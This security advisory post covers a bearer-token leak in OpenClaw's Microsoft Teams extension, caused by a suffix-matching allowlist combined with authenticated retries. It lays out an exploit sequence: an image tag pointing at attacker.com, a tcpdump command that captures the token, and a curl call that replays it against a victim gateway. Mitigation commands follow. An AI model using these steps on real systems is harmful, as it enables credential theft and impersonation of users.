OpenClaw, Information Disclosure, CVE-2026-????? (High)

Listen to this Post

This vulnerability affects OpenClaw deployments where the optional Microsoft Teams extension is enabled . When processing inbound messages containing attachments or inline images, the download mechanism retries failed requests (receiving HTTP 401 or 403 status codes) by re-sending the request with an `Authorization: Bearer ` header . The default download allowlist uses suffix matching, including some multi-tenant domains. If an attacker crafts a message referencing an untrusted host that matches the suffix criteria, OpenClaw will forward the victim’s bearer token to that attacker-controlled server. This exposes the token, potentially granting access to the user’s connected services and conversations . The issue is patched in version 2026.2.1.

dailycve form:

Platform: npm package
Version: <= 2026.1.30
Vulnerability: Token leak via retry
Severity: High
Date: 2026-02-18

Prediction: Patch already available (2026.2.1)

What Undercode Say:

Analytics

The vulnerability stems from two architectural flaws: overly permissive allowlist definitions using suffix matching, and insecure error handling that re-transmits sensitive tokens without validating the target host. The inclusion of multi-tenant domains in the default allowlist expands the attack surface significantly. This is a classic case of a confused deputy problem, where the OpenClaw agent acts on behalf of the user but fails to properly validate the destination of sensitive credentials. The fix involves both strict allowlist management and preventing automatic retries with authentication headers to untrusted origins.

Exploit:

1. Attacker sets up a server with a domain that matches the suffix allowlist (e.g., attacker.com if .com is allowed)
2. Attacker sends a Microsoft Teams message to the victim containing an inline image:
<img src="https://attacker.com/leak">
3. When OpenClaw fetches the image, the attacker's server returns 401 Unauthorized
4. OpenClaw retries the request with the victim's Authorization: Bearer token
5. Attacker captures the token:
sudo tcpdump -i eth0 -A -s 0 'tcp port 80 and host attacker.com'
6. Attacker uses the token to access the victim's OpenClaw gateway:
curl -H "Authorization: Bearer <captured_token>" http://victim.local:18789/api/status

Protection from this CVE

1. Immediately update to patched version:
npm update openclaw@latest
Or explicitly:
npm install [email protected]
2. If update is not possible, disable the vulnerable MS Teams extension:
Edit OpenClaw configuration file (usually ~/.openclaw/config.yaml)
sed -i 's/teams_enabled: true/teams_enabled: false/' ~/.openclaw/config.yaml
3. Harden the auth host allowlist (older versions only):
Restrict to specific Microsoft-owned domains only
echo "auth_allowlist:" >> ~/.openclaw/config.yaml
echo " - teams.microsoft.com" >> ~/.openclaw/config.yaml
echo " - graph.microsoft.com" >> ~/.openclaw/config.yaml
Remove any wildcard or multi-tenant entries like .onmicrosoft.com
4. Verify no unauthorized outbound traffic:
sudo lsof -i -n | grep openclaw

Impact

Successful exploitation allows an attacker to capture a valid OpenClaw bearer token. With this token, the attacker can:
– Impersonate the victim agent
– Read conversation history and private messages
– Access connected services (email, calendar, files)
– Execute commands on the host if the gateway is exposed
– Pivot to internal networks if the OpenClaw instance has network access
– Exfiltrate credentials stored in plaintext in the `~/.openclaw/` directory

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top